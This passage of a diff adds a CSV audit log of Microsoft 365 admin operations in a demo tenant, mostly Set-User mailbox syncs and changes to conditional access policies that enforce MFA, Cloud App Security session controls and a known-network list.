+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""macOS\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/17/2020 3:04:51 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Megan MFA demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-17T03:14:05Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-17T03:14:06Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-17T03:04:51Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8872f6fb-da88-4b63-bcc7-17247669596b""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""09abbdfd-ed23-44ee-a2d9-a627aa1c90f3\"",\""cc15fd57-2c6c-4117-a88c-83b1d56b4bbe\"",\""00000003-0000-0ff1-ce00-000000000000\"",\""00000005-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/17/2020 3:04:50 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-17T03:54:47Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-17T03:54:47Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-17T03:27:52Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a792cdf5-6148-47eb-85fe-044ee521d534""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-17T03:44:36Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\f7ed24a4-8fab-4f94-a97f-533604a3453a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-17T09:56:20Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-17T09:56:21Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-17T09:28:39Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a792cdf5-6148-47eb-85fe-044ee521d534""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-17T09:43:43Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\f7ed24a4-8fab-4f94-a97f-533604a3453a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-17T11:07:48Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a792cdf5-6148-47eb-85fe-044ee521d534""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-17T14:47:31Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\4fa53e5c-cfa7-4206-8b32-0c555070f202""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-05-17T11:35:54Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a792cdf5-6148-47eb-85fe-044ee521d534""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-04-05T21:17:39Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-02T14:04:02.8334473Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/5/2020 9:17:39 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-05T21:20:19Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-02T14:04:02.8334473Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/5/2020 9:20:18 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-05T21:17:41Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-02T14:04:02.8334473Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/5/2020 9:17:41 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-06T08:45:13Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/6/2020 8:45:13 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-06T08:41:18Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""Controls\"":[{\""Control\"":[\""RequireCompliantDevice\""]},{\""Control\"":[\""RequireDomainJoinedDevice\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/6/2020 8:41:17 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-06T08:40:49Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-06T08:39:19.6970049Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/6/2020 8:40:49 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-06T08:45:56Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/6/2020 8:45:55 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-06T08:45:32Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-06T08:44:09.233453Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/6/2020 8:45:31 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-06T08:45:08Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-06T08:44:09.233453Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/6/2020 8:45:08 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-06T08:26:12Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-06T08:24:56.335593Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/6/2020 8:26:11 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-06T08:25:34Z,,,New-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Organization"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com""
+  }
+]"
+2020-04-02T14:02:50Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-02T14:01:20.8151957Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/2/2020 2:02:49 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-02T14:02:52Z,,,New-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Organization"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com""
+  }
+]"
+2020-04-02T13:49:42Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-02T13:48:52.4174195Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/2/2020 1:49:41 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-02T14:05:54Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\73b07c2f-ef9f-4b21-9e02-c0b1013c09c4""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/2/2020 2:05:53 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-02T14:06:17Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-02T14:04:02.8334473Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/2/2020 2:06:16 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-04T10:43:38Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/4/2020 10:43:38 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Semolen - Admin MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-04T10:43:38Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\235bec94-f744-48ac-8314-5675953d2def""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""macOS\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/4/2020 10:43:38 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Megan MFA demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-04T10:43:39Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\73b07c2f-ef9f-4b21-9e02-c0b1013c09c4""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/4/2020 10:43:38 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-04T10:43:38Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Acrs\"":[\""urn:microsoft:req1\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/4/2020 10:43:38 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Step-up""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-04T10:43:39Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8837fdaa-aaeb-4432-9622-43f6f583d583""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""KnownNetworkPolicies\"":{\""NetworkName\"":\""BE-Office\"",\""NetworkId\"":\""b98b9088-ce88-4fae-80fb-5b58cb1ce685\"",\""CidrIpRanges\"":[\""109.88.218.99/28\""],\""CountryIsoCodes\"":null,\""Categories\"":[],\""ApplyToUnknownCountry\"":false}}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/4/2020 10:43:39 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""6""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Known Networks List""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""3/19/2020 7:45:08 PM""
+  }
+]"
+2020-04-04T10:43:38Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\bcd93f74-64fd-4042-a3ae-ee6d48886d6d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/4/2020 10:43:38 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Form MCAS""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-04T10:43:38Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
